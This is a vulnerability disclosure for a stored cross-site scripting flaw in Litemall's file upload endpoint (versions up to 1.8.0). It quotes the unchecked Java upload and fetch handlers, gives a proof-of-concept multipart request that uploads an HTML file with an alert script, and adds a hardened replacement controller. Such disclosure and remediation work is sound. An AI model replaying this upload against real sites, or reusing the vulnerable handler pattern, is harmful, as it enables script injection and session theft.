Stored XSS Vulnerability in /wx/storage/upload (Litemall ≤ v1.8.0) #567

@ez-lbz

Description

Summary

A stored cross-site scripting (XSS) vulnerability exists in Litemall versions ≤ 1.8.0 at the /wx/storage/upload endpoint. The application does not validate file extensions when processing uploaded files, allowing attackers to upload files that carry active content, such as .html, .htm, or .pdf. These files are then served back to clients directly, with no sanitization, resulting in stored XSS.

Details

The vulnerable upload functionality (the source) is implemented as follows:

```java
@PostMapping("/upload")
public Object upload(@RequestParam("file") MultipartFile file) throws IOException {
    // The client-supplied filename is used as-is: no extension check.
    String originalFilename = file.getOriginalFilename();
    // The client-supplied Content-Type is persisted alongside the file and later replayed on download.
    LitemallStorage litemallStorage = storageService.store(file.getInputStream(), file.getSize(), file.getContentType(), originalFilename);
    return ResponseUtil.ok(litemallStorage);
}
```

Uploaded files are served back (the sink) by:

```java
@GetMapping("/fetch/{key:.+}")
public ResponseEntity<Resource> fetch(@PathVariable String key) {
    LitemallStorage litemallStorage = litemallStorageService.findByKey(key);
    ...
    Resource file = storageService.loadAsResource(key);
    // The stored (attacker-chosen) Content-Type is echoed back, so text/html renders inline.
    return ResponseEntity.ok()
        .contentType(MediaType.parseMediaType(litemallStorage.getType()))
        .body(file);
}
```

Since there is no file type restriction and no content sanitization, attackers can upload malicious HTML/JavaScript files, which will be executed when a victim accesses the returned URL.

Proof of Concept (PoC)

Malicious file upload request:

```http
POST /wx/storage/upload HTTP/1.1
Host: localhost:8080
X-Litemall-Admin-Token: 1e68640e-a324-48d0-a8c5-e2fa49efa42d
sec-ch-ua: "Not)A;Brand";v="8", "Chromium";v="138", "Google Chrome";v="138"
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary4nZrTVGVaxBsDdAW
sec-ch-ua-platform: "Windows"
Origin: http://localhost:9527
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-site
Referer: http://localhost:9527/
Accept-Encoding: gzip, deflate, br, zstd
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36
Accept: */*
Accept-Language: zh-CN,zh;q=0.9
sec-ch-ua-mobile: ?0
Content-Length: 11378

------WebKitFormBoundary4nZrTVGVaxBsDdAW
Content-Disposition: form-data; name="file"; filename="2.html"
Content-Type: text/html

<script>alert('XSS')</script>
------WebKitFormBoundary4nZrTVGVaxBsDdAW--
```

Accessing the uploaded file triggers XSS:

```
http://localhost:8080/wx/storage/fetch/t1c4hvv5inv004ol4zoa.html
```

Impact

  • Execution of arbitrary JavaScript in the victim’s browser.

  • Cookie theft and session hijacking leading to account takeover.

  • Privilege escalation if an administrator account is targeted.

  • Possible use as a pivot point for further client-side attacks (e.g., phishing).

Root Cause

The vulnerability is caused by the lack of file extension validation combined with serving uploaded files directly under their original, client-declared content type, which results in execution of attacker-controlled code in the browser.

Recommendation

Implement strict file extension validation and sanitize uploaded files to prevent execution of active content such as HTML, JavaScript, or PDFs with embedded scripts.
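As an added example, not part of this report or of Litemall's own code, the following Spring controller shows one way to apply the recommendation to the two handlers quoted above: an extension allow-list, a magic-number check so the content matches the claimed extension, a server-chosen Content-Type that ignores the one the client sent, and download headers (`X-Content-Type-Options: nosniff`, a `sandbox` CSP, `Content-Disposition: attachment` for anything not on the allow-list) so that files already on disk from before the fix are no longer rendered as HTML. The names `StorageService`, `LitemallStorageService`, `LitemallStorage`, `storageService.store(...)`, `storageService.loadAsResource(...)`, `litemallStorageService.findByKey(...)` and `ResponseUtil.ok(...)` are taken from the report and assumed to exist with the signatures shown there; `ResponseUtil.fail(int, String)`, the allow-list contents, the size limit and the key pattern are assumptions of this example.

```java
import java.io.IOException;
import java.io.InputStream;
import java.util.Arrays;
import java.util.Locale;
import java.util.Map;
import java.util.regex.Pattern;
import org.springframework.core.io.Resource;
import org.springframework.http.ContentDisposition;
import org.springframework.http.HttpHeaders;
import org.springframework.http.MediaType;
import org.springframework.http.ResponseEntity;
import org.springframework.web.bind.annotation.*;
import org.springframework.web.multipart.MultipartFile;

// Example hardening of the /wx/storage upload and fetch handlers (not Litemall's code).
// StorageService, LitemallStorageService, LitemallStorage and ResponseUtil are assumed
// to exist as used in the report; ResponseUtil.fail(int, String) is an assumed helper.
@RestController
@RequestMapping("/wx/storage")
public class HardenedStorageController {

    // Allow-listed extensions paired with the only Content-Type the server will emit for each.
    // The Content-Type declared by the client is attacker-controlled and is never trusted.
    private static final Map<String, MediaType> ALLOWED_TYPES = Map.of(
            "jpg", MediaType.IMAGE_JPEG, "jpeg", MediaType.IMAGE_JPEG,
            "png", MediaType.IMAGE_PNG, "gif", MediaType.IMAGE_GIF);

    // Leading bytes (magic numbers) each allowed format must start with.
    private static final Map<String, byte[]> MAGIC = Map.of(
            "jpg", new byte[] {(byte) 0xFF, (byte) 0xD8, (byte) 0xFF},
            "jpeg", new byte[] {(byte) 0xFF, (byte) 0xD8, (byte) 0xFF},
            "png", new byte[] {(byte) 0x89, 'P', 'N', 'G'},
            "gif", new byte[] {'G', 'I', 'F', '8'});

    // Storage keys are server-generated bare filenames (e.g. t1c4hvv5inv004ol4zoa.html in the
    // report); anything else, including path segments, is rejected before touching storage.
    private static final Pattern SAFE_KEY = Pattern.compile("^[A-Za-z0-9_-]{1,64}\\.[a-z0-9]{1,5}$");
    private static final long MAX_BYTES = 5L * 1024 * 1024; // assumed limit

    private final StorageService storageService;
    private final LitemallStorageService litemallStorageService;

    public HardenedStorageController(StorageService storageService,
                                     LitemallStorageService litemallStorageService) {
        this.storageService = storageService;
        this.litemallStorageService = litemallStorageService;
    }

    /** Returns the lower-cased extension if it is allow-listed, otherwise null. */
    static String allowedExtension(String filename) {
        if (filename == null) return null;
        int dot = filename.lastIndexOf('.');
        if (dot < 0 || dot == filename.length() - 1) return null;
        String ext = filename.substring(dot + 1).toLowerCase(Locale.ROOT);
        return ALLOWED_TYPES.containsKey(ext) ? ext : null;
    }

    /** True if the upload's first bytes match the magic number of the claimed extension. */
    static boolean magicMatches(String ext, byte[] head) {
        byte[] expected = MAGIC.get(ext);
        return expected != null && head.length >= expected.length
                && Arrays.equals(Arrays.copyOf(head, expected.length), expected);
    }

    @PostMapping("/upload")
    public Object upload(@RequestParam("file") MultipartFile file) throws IOException {
        String ext = allowedExtension(file.getOriginalFilename());
        if (ext == null || file.getSize() > MAX_BYTES) {
            return ResponseUtil.fail(400, "file type or size not permitted");
        }
        byte[] head = new byte[8];
        try (InputStream in = file.getInputStream()) {
            head = Arrays.copyOf(head, Math.max(in.read(head), 0));
        }
        if (!magicMatches(ext, head)) {
            return ResponseUtil.fail(400, "file content does not match its extension");
        }
        // Persist the server-chosen Content-Type, never the one the client sent.
        LitemallStorage stored = storageService.store(file.getInputStream(), file.getSize(),
                ALLOWED_TYPES.get(ext).toString(), file.getOriginalFilename());
        return ResponseUtil.ok(stored);
    }

    @GetMapping("/fetch/{key:.+}")
    public ResponseEntity<Resource> fetch(@PathVariable String key) {
        if (!SAFE_KEY.matcher(key).matches() || litemallStorageService.findByKey(key) == null) {
            return ResponseEntity.notFound().build();
        }
        String ext = allowedExtension(key);
        HttpHeaders headers = new HttpHeaders();
        // Browsers must not sniff a different type, and nothing served here may run script,
        // which also neutralises HTML files stored before this fix was deployed.
        headers.set("X-Content-Type-Options", "nosniff");
        headers.set("Content-Security-Policy", "default-src 'none'; sandbox");
        MediaType type = ext != null ? ALLOWED_TYPES.get(ext) : MediaType.APPLICATION_OCTET_STREAM;
        if (ext == null) { // legacy or unknown file: force a download instead of inline rendering
            headers.setContentDisposition(ContentDisposition.attachment().filename(key).build());
        }
        return ResponseEntity.ok().headers(headers).contentType(type)
                .body(storageService.loadAsResource(key));
    }
}
```

The fetch-side headers are the part worth keeping even if the allow-list is later widened: with `nosniff` and a `sandbox` CSP, a `text/html` response from this endpoint still cannot execute script, so the stored-XSS path is closed independently of what the upload check lets through. Serving user content from a separate origin (a dedicated storage hostname) would remove the remaining risk to the application's cookies entirely.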
